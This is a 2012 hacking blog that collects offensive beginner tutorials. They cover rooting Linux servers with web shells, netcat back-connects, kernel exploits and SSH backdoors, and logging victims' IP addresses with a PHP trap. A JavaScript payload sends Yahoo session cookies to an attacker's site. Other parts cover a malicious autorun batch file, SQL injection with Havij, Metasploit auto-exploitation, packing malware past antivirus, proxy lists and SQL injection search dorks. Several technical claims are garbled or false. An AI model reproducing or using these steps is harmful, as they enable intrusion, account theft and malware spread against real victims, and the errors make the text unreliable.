Get Connected on Facebook



Monday, July 30, 2012

Rooting a server ...


★☆★ With the Name of ALLAH, who gave me the Power of Knowledge ! ★☆★

Hey all , I BASIT ALI SOOMRO and i am going to teach you all about rooting linux boxes and linux knowledge that you must know if you are hacker

[Thanks to Anonymous hackers ]


#So Lets Start...

These are Some Basic Questions asked by myself as a n00b

# What is rooting ?
A. Getting access to the user => "root", the main admin of the site.


# What is the need of rooting ?
A. Getting master admin privillages of Servers


Things you need

# A Shell on a Website
# An Exploit
# Log cleaner
# Ssh Backdoor
# Netcat
# A Brain

Simply you can seach on http://www.google.com for these, except BRAIN and SHELL


Getting Back Connection to the servers


Open command prompt, and go to NetCat Path, Type
"cd netcat.exe"

ok Open your Shell in your browser, go to the back connection tab, if it is not there get a shell like "WSO 2.3" or Any other
thats your choice....

Specify your "ip & port as 2121". press connect, now you'll get a shell to the server, you can give commands to the server through that shell.

now came back to netcat and type "nc -l -v -p 2121"

it will give you this output:
Code:
c:\netcat>nc -l -v -p 2121
listening on [any] 2121 ...


Getting a Right exploit for the servers


Type : Uname -a & hit enter.
It'll look something like this:

Code:
[admin@www.target.com /home/saijyoti/public_html/cgi-bin]$ uname -a
Linux dualxeon09.ns5.999servers.com 2.6.18-194.26.1.el5 #1 SMP Tue Nov 9 12:54:20 EST 2010 x86_64 x86_64 x86_64 GNU/Linux

You have noted, It shows the kernal version of the server is: 2.6.18-194.26.1.el5
& Year is 2010.

You need to find a perfect exploit for it. you can find them at:-
$ Exploit-db.com
$ Packetstormsecurity.org
$ Th3-0utl4ws.com
$ Leetupload.com


Compiling & executing exploits


Now I've got a exploit, & it is written in C. So I can't execute it by just uploading. but I need to compile it.

Before proceeding further, Cd into the tmp directory, because it is always writable. So type: Cd /home/XXXXX/public_html/tmp
// The path may be different, replace it with yours.

So first I'll get the exploit on the server, So I type : Wget http://exploitsite.net/2010-exploits/exploit.c
// Note: There is no such site, I'm just taking it to show you.
It'll look something Like this:-

Code:
admin@www.target.com /home/target_usernemr/public_html/tmp]$ wget http://exploitsite.net/2010-exploits/exploit.c
--2011-01-25 08:21:43-- http://exploitsite.net/2010-exploits/exploit.c
Resolving http://www.exploitsite.net... 199.58.192.192
Connecting to http://www.exploitsite.net|199.58.192.192|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 15088 (15K) [text/x-csrc]
Saving to: `exploit.c'


now change the permission of the exploit to 777.
Type: "Chmod 777 exploit.c"

Now the exploit is On my server, I just need to compile & execute it.
So, I'll give the command: "gcc -o exploit exploit.c"
It'll compile & save the exploit as >> exploit

Next step is to execute it So we'll type: "./exploit"


here it'll show different process...
: #
: #
got root you m0f0 !! [


Now it say got root. Let's Check is it true,
Type: "whoami"

then it will say "root"

like: uid=0(root) gid=0(root) groups=0(root)

type "su" to get full privilages !


Installing Backdoors

type: "Wget http://www.urlofbackdoor.com/sshdoor.zip"


Then Type,
Unzip Sshdoor.zip
Then, => Cd sshdoor
Then type, ./run pass port
^ replace pass with your password, & a port.

Now connect with putty & enjoy root privileges.


Methods to execute exploits written in other languages


C exploit

----------------------
gcc -o exploit exploit.c
chmod +x exploit
./exploit
----------------------

Perl Exploits

---------------
perl exploit.pl
---------------

Python

------------------
python exploit.py
------------------

php

-----------------
php exploit.php
-----------------

zip

----------------
unzip exploit.zip
./run
----------------


All Questions are Welcome


Good Luck guys

How to steal an IP address


How to steal an IP address
You can now get anyone's IP address using a very simple and straight forward script. Just follow the instruction's Below

1. First you need to have a php enabled hosting site. Below is a list of free php hosting sites


110mb - http://110mb.com
Ripway - http://ripway.com
SuperFreeHost - http://superfreehost.info
Freehostia - http://freehostia.com
Freeweb7 - http://freeweb7.com
t35 - http://t35.com
Awardspace - http://awardspace.com
PHPNet - http://phpnet.us
Free Web Hosting Pro - http://freewebhostingpro.com
ProHosts - http://prohosts.org
FreeZoka - http://www.freezoka.com/
000webhost - http://000webhost.com/
AtSpace - http://atspace.com
My3gb - http://my3gb.com
For the sake of a quick tutorial, sign up for an account at my3gb.com

2. Now create a php script using notepad on your computer. Simply copy and paste the script below into your notepad and save it as index.php




$file = "code7.txt";
$f=fopen($file, 'a');
fwrite($f,$_SERVER['REMOTE_ADDR']."\n");
fclose($f);
?>

File not found




3. Create an empty text file with notepad and rename it as code7.txt

4. Now upload the two files (index.php and code7.txt) to your web hosting site (my3gb.com)

 The link to your php script that you need to send to your victim will therefore be....
''www.username.my3gb.com/index.php''
Once your victim clicks on the above url, he will be redirection to a page ''File not found'' while his IP address will be logged in the file ''code7.txt''


That is why it is highly advised to conseal your IP whenever you are surfing the net. This can be done with the help of IP hiding software like, Easy-hide ip address, Superhide IP address e.t.c

http://hidemyass.com Apart from IP hiding software, you can also use free online annonymisers at..
www.onlineanonymizer.com

To prove this, note down your own real IP address by passing through yourindex.php link, then pass through the index.php link again using any of the above online annonymisers, you will notice the diffrerence in your IP address.
Want to see your real IP address? CLICK HERE

Stay safe!!! if you know to hack, you will know how to protect :

Remote Hacking with Telnet



Telnet is a remote hacking tool that was made by Microsoft. Telnet actually lets you remote into machines, or connect to different computers remotely -- WITHOUT physically being at the computer. Hackers do EVERYTHING remote, and for obvious reasons. As a golden rule, hackers NEVER hack directly from their own home/parents' basement. This makes it really easy for the feds to hunt you down.

Instead, skilled hackers remote into a chain of several computers around the world, making your tracks a lot harder to find. This is called footprinting. Telnet will allow you to log into any computer (provided that it's running Telnet). I recommend running Telnet and having it open on your computer(s).

Why Telnet?

There are several reasons to run Telnet. Assuming that you're running Windows XP, here are some of the benefits

Small
Fast
Built right into Windows - easily accessable
Widely used
Secure
Lets you log into computers remotely
Telnet is the only technology that gives you the power to control machines remotely. And in order to cover your tracks, it is highly recommended that you learn how to use it.

How to Chain-hack with Telnet

Chain hacking is a method in which a hacker uses Telnet to connect through a chain of computers and hack a computer/person/server from a different location. It might sound complicated to the average newbie, but it's quite simple. Just follow these steps:

Choose public place with an internet connection, such as a library or coffee shop. Bring your own equipment if possible.
Run telnet (Start > Run > Telnet)
Log into a remote server
Use that server to remote into another server
Repeat steps 2-4 a couple times
Hack your target
What you're basically doing is using a series of machines as a chain in order to conceal your location/identity. The farther away each server/remote PC is from the other, the better. If you can remote across to a different continent, I would recommend doing so, because that's what I do when I hack big company databases. This method is explained in more detail here.



A hacker who knows what he's doing in Telnet
Going Further with Telnet

While this site provides a lot of information, programs like Sub7, Ping, and Telnet have extensive documentation of their own. If you would like to read up on all of the rich features on Telnet, Telnet.org is your number one resource.

Hack your friend's mouse !


Hack Your Friend's Mouse

Steps:-
1. Open the notepad file

2. Just copy and paste the below code in your notepad file. . .

@echooffsetkey="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"regdelete%key%regadd %key% /v Start /t REG_DWORD /d 4

3.Save the file as .bat extension. . .

4.Then create the other notepad file and
Just copy and paste the below code in your notepad file. . .

[autorun]

Open=filename.fileextension is bat

Action=Mouse Disable


you have to put the name .bat which is already done by you. .

5 save the file as autorun.inf

6.Now just copies these two files and paste it in your pen drive. . .
And hide these both file . . .
Whenever your friend insert your pen drive in his computer
These both files are run automatically. . .and then the mouse will be disable. .

For enabling the Mouse. .
Go to run
Type regedit
Then go to
HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass
Click on start
And modify its value 1 instead of 4. . .
After this the Mouse will enable.

what is hacking ?


What is hacking?
----------------
According to popular belief the term hacker and hacking was founded at mit
it comes from the root of a hack writer,someone who keeps "hacking" at
the typewriter until he finishes the story.a computer hacker would be
hacking at the keyboard or password works.

What you need:
--------------
To hack you need a computer equipped with a modem (a device that lets you
transmit data over phone lines) which should cost you from $100 to $1200.

How do you hack?
----------------
Hacking recuires two things:
1. The phone number
2. Answer to identity elements

How do you find the phone #?
----------------------------
There are three basic ways to find a computers phone number.
1. Scanning,
2. Directory
3. Inside info.

What is scanning?
-----------------
Scanning is the process of having a computer search for a carrier tone.
For example,the computer would start at (800) 111-1111 and wait for carrier
if there is none it will go on to 111-1112 etc.if there is a carrier it
will record it for future use and continue looking for more.

What is directory assictance?
-----------------------------
This way can only be used if you know where your target computer is. For this
example say it is in menlo park, CA and the company name is sri.

1. Dial 411 (or 415-555-1212)
2. Say "Menlo park"
3. Say "Sri"
4. Write down number
5. Ask if there are any more numbers
6. If so write them down.
7. Hang up on operator
8. Dial all numbers you were given
9. Listen fir carrier tone
10. If you hear carrier tone write down number, call it on your modem and your
    set to hack!
   this article was written by Jolly Roger.

hack yahoo with JavaScript


Talking in simple language, whenever we sign into an account it generates a unique piece of string. One copy is saved on server and other in our browser as cookie. Both are matched every time we do anything in our account.
 This piece of string or login session is destroyed when we click on 'Sign Out' option.
Just login to yahoo.com. Type in browser javascript:alert(document.cookie);
You would get a pop up box showing you the cookies. Now login to your account and do same thing, you would see more elements added to the cookies. These represent sessions ids.


Note: By saying , stealing sessions or stealing cookies, I mean the same thing. Sessions are stored in our browser in form of cookies.

An attacker can steal that session by convincing victim to run a piece of code in browser. Attacker can use that stolen session to login into victim's account without providing any username/password. This attack is very uncommon because when the victim clicks 'Sign out' , session gets destroyed and attacker too also gets signed out.

But in case of yahoo, its not the same.The attacker doesnt get signed out when victim clicks 'Sign out'. Though the session automatically gets destroyed after 24hrs by yahoo. But when user simply refreshes the windows in yahoo account, he gets sessions for next 24 hrs. This means, once the yahoo account session is stolen , attacker can access the account for life time by refreshing window in every 24hrs. I am not actually sure whether its 24 or 48 hrs.

Requirement: Download some files from here
http://www.ziddu.com/download/14334127/cookiestealer.rar.html

Tutorial to steal session IDs :-
1. Sign Up for an account at any free webhosting site. I have chosen my3gb.com.

2. Login to your account and go to file manager. Upload the four files that you have just downloaded.
Make a new directory 'cookies' here.



3. Give this code to victim to run in his browser when he would be logged in to his yahoo account. Yahoo.php is basically cookie stealing script and hacked.php executes the stolen cookies in browser.
Stolen cookies get stored in directory 'cookies'
javascript:document.location='http://yourdomain.com/yahoo.php?ex='.concat(escape(document.cookie));
He would again redirected to his yahoo account.

4. Open the hacked.php . The password is 'hsakapandit'.

You must have got the username of victim's account. Simply Click on it and it would take you to inbox of victim's yahoo account without asking for any password.


Now it doesn't matter if victim signs out from his account, you would remain logged into it.
Note: You can try this attack by using two browsers. Sign into yahoo account in one browser and run the code. Then sign in through other browser using stolen session.

Hack Website with havij !!


First Find a sqli infected site .

Now Let's start

Open havij and copy and paste infected link in to the "target".

now set every thing as auto detect because it is easy for a soft to detect which method should be applied ... after doing the same click "analyze"

after clicking analyzing this will automatically detect the infected link and injects the best method which is suitable for given link...
one thing more havij has good that it automatically finds everything just you need to be stay cool n calm and wait for a while...

after clicking "analyze" this will start seaching the database type,name,version bla bla .....

Then It shows some messages there....Be alert on it and be show patience for sometime to find it's vulernable and type of injection and if db server is mysql and it will find database name.Then after get it's database is name like xxxx_xxxx

Then Move to another operation to find tables by clicking "tables" as figure shown.Now click "Get tables" Then wait some time if needed....

After founded the tables ,you can see there will be "users" Put mark on it and click in the " get columns " ....

after user's there should be user names and passwords In that Just put mark username and password and click "Get data"....

Bingo Got now id and pass that may be admin...
The pass will get as md5 you can crack it also using this tool.....
mostly the paswords hashes are in md5 but if it is not in md5 dont get tense there are many online sites which automatically detects the hash n cracks :D :D

and in the last you need to find the admin page to "login"..... sometime its easy to find but some times its very difficult but havij can also find admin page by clicking on "find admin"......

when you get loged in do what you want :D :D

thanks for reading :D happy hacking :D

More then 1000 proxie servers !!!


TEST PROXIES FIRST, THEY BURN OUT FAST ~~!

#################################
# Albania
#################################
80.78.65.220:8080
#################################
# Argentina
#################################
190.112.73.150:80
190.210.68.229:80
190.3.106.166:80
200.110.156.120:80
200.61.188.123:80
#################################
# Armenia
#################################
95.140.196.34:3128
#################################
# Australia
#################################
113.192.9.214:80
113.192.9.216:80
113.192.9.221:80
203.31.34.144:80
#################################
# Austria
#################################
88.116.255.68:80
#################################
# Azerbaijan
#################################
85.132.34.220:3128
#################################
# Bahamas
#################################
24.51.85.26:3128
24.51.85.26:80
#################################
# Belgium
#################################
94.225.83.19:8123
#################################
# Brazil
#################################
187.115.25.79:80
187.45.214.4:8080
189.10.4.2:80
189.111.174.148:80
189.112.224.26:3128
189.30.149.199:80
189.38.243.76:3128
189.45.8.65:80
200.149.130.218:80
200.150.73.138:80
200.201.187.178:80
200.241.156.143:80
200.254.107.135:8000
201.0.166.57:3128
201.62.160.69:8080
#################################
# Brunei
#################################
119.160.183.218:3128
#################################
# Canada
#################################
142.151.131.54:8909
174.117.160.225:8123
174.142.125.161:80
198.235.15.70:80
198.96.86.68:80
66.199.151.206:80
67.193.20.186:8123
75.158.138.200:8123
99.234.218.47:8123
#################################
# Chile
#################################
164.77.196.75:63835
164.77.196.75:80
164.77.196.78:63835
164.77.196.78:80
200.29.170.130:8080
#################################
# China
#################################
111.186.99.67:8909
112.65.171.122:8080
113.105.179.190:808
113.195.131.33:8080
113.59.99.122:80
113.59.99.123:80
114.112.194.194:8080
114.113.159.154:80
114.86.123.61:8909
115.155.92.193:8909
116.112.64.226:443
116.228.226.213:1337
117.27.139.17:80
118.132.143.132:8909
118.180.7.30:9000
119.147.146.14:8080
121.10.109.142:80
121.11.149.250:8081
121.11.64.13:80
122.0.64.210:8080
122.224.216.170:80
122.226.156.181:808
122.226.50.66:8080
124.160.62.105:80
124.192.128.222:8909
125.64.227.86:1337
125.88.125.201:8083
166.111.132.159:8080
166.111.186.109:8000
180.139.136.82:1337
182.39.12.247:8909
202.100.92.33:80
202.102.48.205:8080
202.116.160.89:80
202.116.62.218:808
202.116.65.241:80
202.118.250.234:8080
202.85.222.143:80
202.99.21.162:8081
210.21.96.36:80
210.22.153.98:3128
210.51.43.82:80
210.72.133.99:8909
211.157.227.84:81
218.106.91.61:1337
218.22.64.244:8080
218.74.123.46:80
218.84.213.86:80
219.140.60.42:8080
219.143.33.94:808
219.149.166.6:63000
219.72.2.82:8080
220.189.227.74:63000
220.194.59.162:80
221.10.159.234:1337
221.6.15.147:80
222.128.27.139:8088
222.171.60.156:8888
222.178.37.42:1337
222.185.237.37:3128
58.216.168.138:1337
58.22.151.6:80
58.25.163.192:8909
59.151.100.19:80
59.33.44.85:808
59.49.19.39:1337
59.51.45.33:8909
60.190.189.214:8123
60.206.105.251:80
60.209.5.166:808
60.210.0.30:8080
60.216.101.232:808
60.216.99.222:80
60.63.87.77:8909
61.132.216.205:80
61.136.196.202:1337
61.166.155.103:8909
61.180.67.212:80
61.190.28.166:8080
61.50.247.227:8080
#################################
# Colombia
#################################
190.143.64.158:80
190.144.147.198:80
#################################
# Denmark
#################################
80.63.56.146:8118
93.166.121.107:8118
#################################
# Dominican Republic
#################################
200.26.175.114:8080
#################################
# Ecuador
#################################
201.219.0.102:8080
#################################
# France
#################################
195.221.75.4:80
213.186.60.206:8080
62.147.241.46:80
80.15.201.6:808
84.246.226.180:80
88.171.64.83:6195
88.190.235.142:80
88.190.235.165:80
88.191.131.158:80
91.121.100.200:8118
91.121.136.6:80
94.125.166.95:80
#################################
# Germany
#################################
109.193.37.26:80
149.249.17.34:8080
195.37.234.5:80
46.4.25.9:80
82.165.221.70:80
89.149.223.168:3128
93.92.129.147:80
93.92.129.152:80
#################################
# Hong Kong
#################################
113.255.250.200:9415
119.247.132.80:8909
123.203.163.183:8909
123.203.75.12:8909
14.199.16.61:8909
210.17.240.22:8080
218.213.90.92:8080
223.19.105.185:80
#################################
# Hungary
#################################
89.135.18.91:80
#################################
# India
#################################
110.234.20.97:8080
115.249.54.36:6588
115.252.100.245:6588
182.72.228.150:8080
183.82.97.111:3128
210.212.29.147:8080
210.7.75.138:80
27.251.106.115:6588
#################################
# Indonesia
#################################
114.134.75.182:3128
123.108.103.142:3128
123.108.103.142:80
123.108.103.142:8000
125.160.17.37:54321
202.147.254.111:80
202.147.254.111:8080
202.67.13.84:8080
202.67.13.86:6060
202.67.13.86:8080
#################################
# Iran
#################################
78.38.171.22:808
85.15.13.250:8080
#################################
# Ireland
#################################
46.51.216.189:80
66.197.176.184:80
83.147.188.219:443
#################################
# Israel
#################################
80.74.123.30:8080
#################################
# Italy
#################################
178.32.225.156:3128
213.92.9.98:80
#################################
# Japan
#################################
113.43.162.61:81
183.181.164.180:80
#################################
# Kazakhstan
#################################
212.154.150.139:443
212.154.150.139:80
212.154.150.139:8080
92.46.119.133:3128
95.57.253.66:3128
#################################
# Kenya
#################################
196.202.200.135:8080
41.191.193.213:8080
#################################
# Korea
#################################
118.42.107.54:808
121.78.112.78:80
125.178.47.40:18080
222.122.9.47:80
#################################
# Malaysia
#################################
219.92.4.115:3128
#################################
# Malta
#################################
192.136.7.5:80
#################################
# Mexico
#################################
200.52.196.123:8080
#################################
# Netherlands
#################################
217.170.36.129:80
#################################
# Norway
#################################
129.240.15.91:80
188.124.131.29:8123
#################################
# Panama
#################################
200.46.123.194:8080
#################################
# Paraguay
#################################
201.217.57.108:80
#################################
# Philippines
#################################
74.86.253.81:443
74.86.253.81:80
85.92.159.84:8080
#################################
# Poland
#################################
212.14.38.95:80
78.9.97.13:80
78.9.97.8:80
81.18.213.36:3128
83.18.34.202:3389
94.23.91.241:3128
#################################
# Portugal
#################################
194.79.87.40:80
195.22.20.7:80
#################################
# Romania
#################################
89.122.211.5:3128
89.42.86.186:3128
#################################
# Russian Federation
#################################
109.203.203.60:3128
109.60.199.200:8000
188.254.47.222:3128
195.135.214.226:8080
195.46.126.5:80
195.64.211.173:3128
212.45.5.172:3128
212.75.150.131:3128
217.76.35.238:3128
46.166.147.126:80
46.181.108.246:808
62.231.165.121:3128
78.139.90.106:3128
78.85.35.222:6588
79.136.184.117:8080
80.64.168.105:3128
81.25.50.109:80
81.25.55.138:3128
82.193.150.168:3128
83.167.72.44:80
85.233.90.4:80
89.169.1.30:3128
89.223.34.67:3128
91.144.178.19:8080
92.50.167.130:3128
93.180.62.114:80
95.143.218.37:3128
95.170.128.58:3128
#################################
# Singapore
#################################
216.12.220.74:9090
#################################
# Slovakia
#################################
92.240.235.80:80
#################################
# Slovenia
#################################
217.72.77.12:8080
#################################
# South Africa
#################################
196.37.205.212:80
#################################
# Spain
#################################
161.111.139.24:80
46.27.78.192:6588
82.223.130.77:80
#################################
# Sweden
#################################
195.35.82.50:80
81.233.9.240:80
88.131.82.241:3128
#################################
# Taiwan
#################################
58.114.238.186:9415
59.120.161.5:80
#################################
# Tanzania
#################################
41.75.212.29:8080
#################################
# Thailand
#################################
119.46.110.1:8080
119.46.110.10:8080
119.46.110.11:8080
119.46.110.13:80
119.46.110.196:80
119.46.110.196:8080
119.46.110.197:80
119.46.110.197:8080
119.46.110.198:80
119.46.110.198:8080
119.46.110.199:80
119.46.110.199:8080
119.46.110.2:8080
119.46.110.200:80
119.46.110.200:8080
119.46.110.201:80
119.46.110.201:8080
119.46.110.202:80
119.46.110.202:8080
119.46.110.203:80
119.46.110.203:8080
119.46.110.204:80
119.46.110.204:8080
119.46.110.249:80
119.46.110.249:8080
119.46.110.3:8080
119.46.110.4:8080
119.46.110.5:8080
119.46.110.6:8080
119.46.110.7:8080
119.46.110.8:8080
119.46.110.9:8080
61.19.244.201:80
61.90.201.57:3128
61.90.201.57:8088
#################################
# Tunisia
#################################
41.230.30.251:6588
#################################
# Turkey
#################################
77.79.107.146:3128
78.186.208.227:80
#################################
# Ukraine
#################################
195.138.88.105:3128
195.24.146.114:3128
195.64.136.82:3128
212.22.216.66:8000
213.159.240.240:3128
213.160.143.150:3128
217.25.199.13:80
46.250.113.57:8000
78.25.20.46:80
91.221.219.45:54321
93.78.214.219:3128
94.232.210.215:3128
95.69.135.118:8000
#################################
# United Kingdom
#################################
109.104.89.117:80
109.104.89.118:80
109.123.111.99:80
109.75.171.73:8080
193.116.157.195:80
213.121.62.120:80
213.175.223.189:8080
80.168.111.130:80
80.168.111.143:80
81.103.125.186:8080
81.19.49.231:80
91.198.165.219:80
#################################
# United States of America
#################################
107.20.152.119:80
107.22.217.223:80
107.22.251.236:80
130.14.29.110:80
130.14.29.111:80
141.219.179.71:8909
160.79.35.27:80
173.10.134.173:8081
173.230.145.121:8123
173.255.250.97:80
173.74.32.192:8080
174.137.152.60:8080
174.137.184.37:8080
174.60.69.229:36081
174.61.136.183:36081
184.106.205.131:80
184.106.215.155:80
184.154.188.122:8118
204.42.255.185:8090
206.208.183.97:80
207.108.136.68:443
207.126.123.14:80
207.126.123.16:80
207.126.123.24:80
207.241.148.125:80
207.241.148.133:80
207.241.148.83:80
207.241.148.85:80
207.241.148.88:80
207.241.149.133:80
207.241.149.48:80
207.241.149.50:80
208.123.212.170:80
208.123.213.30:80
208.185.127.041:80
208.185.127.33:80
208.185.127.41:80
208.185.127.46:80
208.185.16.119:80
208.78.97.11:80
209.144.20.18:80
209.160.43.35:80
209.190.34.248:80
209.200.46.108:80
209.240.134.74:80
209.34.241.44:80
209.54.59.210:80
209.62.12.130:8118
216.17.101.11:80
216.18.231.85:9090
216.206.255.70:80
216.234.133.16:80
216.239.113.197:80
216.239.113.34:80
216.255.86.100:80
216.71.194.189:80
216.92.115.159:80
216.92.167.126:80
24.104.24.146:443
24.104.24.149:443
24.104.24.151:443
24.104.24.152:443
24.124.117.72:80
24.154.27.202:36081
24.179.63.12:443
24.181.40.134:36081
64.130.62.156:80
64.164.61.2:8080
64.186.148.123:80
64.235.242.15:80
64.251.21.37:8080
64.251.21.38:8080
64.251.21.59:8080
64.251.21.60:8080
64.251.21.61:8080
64.251.21.62:8080
64.251.21.63:8080
64.251.21.73:8080
64.251.21.74:8080
64.251.21.75:8080
64.251.21.76:8080
64.251.21.77:8080
64.38.42.30:80
64.79.220.216:80
65.115.127.98:8080
65.49.26.19:54321
65.82.50.146:443
66.119.43.30:80
66.119.43.31:80
66.119.43.32:80
66.119.43.34:80
66.119.43.36:80
66.119.43.37:80
66.147.238.14:443
66.147.238.14:80
66.195.148.37:80
66.39.5.184:80
67.148.11.168:443
67.15.104.28:80
67.155.83.230:443
67.19.193.229:80
67.212.226.148:80
67.228.176.65:443
67.228.176.65:80
67.23.8.46:80
67.55.104.203:80
67.55.115.76:8080
69.113.103.166:8123
69.163.96.22:8080
69.36.168.47:80
69.41.167.2:80
70.90.169.13:80
71.16.199.73:443
71.239.127.237:2479
72.134.21.117:8123
72.22.126.241:36081
72.64.146.73:3128
75.101.146.96:80
75.125.208.10:8118
75.147.206.177:80
75.147.228.186:80
75.148.85.117:8080
75.176.184.171:36081
#################################
# Venezuela
#################################
190.9.128.96:80
#################################
# Viet Nam
#################################
113.160.112.242:8080
203.113.165.243:3128
#################################
# Zimbabwe
#################################
209.88.88.40:80

hack any computer with ip address !


Hack Any Computer With An IP By Using Metasploit

Metasploit is a Magical that allows you to Hack Any Unpatched computer with only it’s IP. Lets begin.

1.) First you need to download Metasploit. The most up-to-date version is Free at metasploit.

2.) You need PostgrSQL for your database. Download it from google, Make sure you use all the defaults or Metasploit woun’t work!

3.) Now lets get down to buisness… After installing both tools, open up the PostgrSQL admin gui (start -> all programs -> PostgreSQL 9.0 -> pgAdmin III). Then right-click on your server (in the left hand box) and click connect. Remember to keep this window open the whole time. You will also need the pass you chose to use in step 5…

4.) Time for some hacking! Go to start -> all programs -> Metasploit Framework, and then open the Metasploit gui. Let it load untill it look like this:

5.)Now, in the window type:

db_connect postgres:ThePassYouChose@localhost:5432

The first time you do this you will see lots of text flash buy. Don’t wory, this is normal.

6.)Type db_host to make sure you are connected correctally.

7.)Now type this:

db_nmap 000.000.000.000

Make sure you put the ip of the computer you are trying to hack in the place of 000.000.000.000…

7.) Now we get to the fun part; the automatic exploitation. Just type db_autopwn -t -p -e -s -b , watch the auto-exploitation start, go play Halo for a while, and then come back…

8.) After the exploitation is done, type sessions -l to see what the scanner found. If all went well, you should see a list of exploits.

9.) Now we get to use the exploits to hack the computer! If you will notice, all of the exploits are numbered, and they all have obvious names (i. e., reverseScreen_tcp). In order to use an exploit, type this:

sessions -i ExploitNumber

The features of Metasploit are mutch like a rat. Once you get into someone’s computer, you can see their screen, controll their mouse, see what they type, see them, etc.”>

How to make all Trojan,Virus,Keylogger undetectable ...


This tutorial tells you how to make a Trojan, Virus, Keylogger, or anything that would be found harmful, NOT. This tutorial explains how to make all files look %100 clean (become clean and be %100 UNDETECTABLE from ALL ANTIVIRUSES!!!!! ALL!!!!!)Ready? GO!
First, get your trojan, virus or keylogger, or server or w/e you plan on using to become undetectable, and get it ready. Fix it up, create it, whatever.

My personal favorite
keylogger: Ardamax Keylogger
Remote Administration Tool (Must not have a router): Poisin Ivy
Google is your friend.

Now that you have your trojan, virus or keylogger or w/e harmful ready, its time to make it UNDETECED!

1. Download Software Passport (Armadillo) by Silicon Realms. This is THE best binder out there I know of, it makes everything %100 UNDETECTABLE BY ALL ANTIVIRUSES (including  Norton, Kaspersky, Avast, etc)… The direct link to dl the program is here:
Code:
http://nct.digitalriver.com/fulfill/0161.001

There is a form to fill out information, so put in your real email address, and then you’ll recieve a download link in your email (it might be in Spam, Junk mail section so beware.)

2. Once you download the program, install it.
3. Once installed, you open it up and see this:
Code:
http://img339.imageshack.us/img339/6…assportzh3.jpg

This is the program. Now that you have it open, you might be confused on what the hell to do, right? Well, this is what you do!

1. Download this pre-made settings. These settings are pre-made by me so you won’t be confused. Everything is working.

DOWNLOAD THIS FOR THE PRE-MADE SETTINGS:
Code:
http://rapidshare.com/files/8749860/projects.arm.html

DOWNLOAD THIS FOR THE BACKUP (You need this in the same location as the projects.arm file) YOU NEED THIS FILE ALSO!
Code:
http://rapidshare.com/files/8750048/projects.Stats.html

Now, when you download these files, and you put them in the SAME FOLDER (or same location), open Software Passport again and click Load Existing Project (top left).

Where it says “Files to Protect” (if theres stuff there, delete it):
Add the files you want to make %100 UNDETECTABLE!!

Now, once done, go to the bottom right and click “Build Project”. A bunch of windows will come up, just click Yes and OK.

Now, once its created, they are %100 undetectable. Go to
Code:
virustotal.com
to scan it with every Antivirus, and they wont find ANYTHING!

„It takes a long time to learn simplicity.“

beginner hacker should know !!!


5 things a Beginner Hacker Should Know



Daily, I get many emails from the school students who want to be a hacker and search hacking related stuffs on internet. At this beginning they need a proper guide but most of them only have Google as a teacher. But there are some common mistake which most of these new hackers do. 




Here are few points for beginners which they should know.






    At this stage, most of the students search for hacking tools and software. But Here i want to make this clear that no tool and software exists which can hack Gmail, Facebook, Yahoo, twitter or any aother website or email account in just few clicks. These types of posts on internet are just for attracting visits and spread spams. Most of this type of hacking tools are binded with trojans which leads your system at risk. The recent example it Anonymous LOIC tool which is used to hack members to use their system in criminal activities.
    Never use any premium keylogger which is available free on filehosting websites. Hackers always host this type of tool with Trojans. After installing this type of keyloggers you will be hacked. 
    Never pay for hacking on the websites which are asking money in return of hacking. If you want to pay for any hacking book, tool or other kit, pay only on the trusted websites. 
    Join any good hacking forum and learn new things from the experts. Never follow a person just for his claims. Always follow a person who has real knowledge. Adding hacker word is not going to make anyone hacker. There are many Javascript pranks and online websites are available which are used to create fake screenshot and defacing pages. These are used by many noobs to create some fake hacking screenshot to share on Facebook. And beginners follow them thinking as a hacker.
    Learn Programming languages and networking. These are must to be a hacker. Most of the hacking attacks such as SQL injection, PHP injection, XSS, Phising and many other needs the knowledge of programming.




Hacker is not the person who use keyloggers for hacking email ids and deface low secure innocent websites. Hacker is the person with indepth knowledge of computer who can create his own exploits to hack in the secure system and servers. hacker is the person who is ready to take challenges. You may heard the name of many hacking groups who deface innocent websites just for fame. I think they are nothing just a noob. Hacking a school website or a shop website is not going to make you a hacker....

5000 google dorks


inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:Pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:opinions.php?id=
inurl:spr.php?id=
inurl:pages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurl:participant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:prod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurl:person.php?id=
inurl:productinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurl:profile_view.php?id=
inurl:category.php?id=
inurl:publications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurl:prod_info.php?id=
inurl:shop.php?do=part&id=
inurl:Productinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurl:product.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurl:produit.php?id=
inurl:pop.php?id=
inurl:shopping.php?id=
inurl:productdetail.php?id=
inurl:post.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
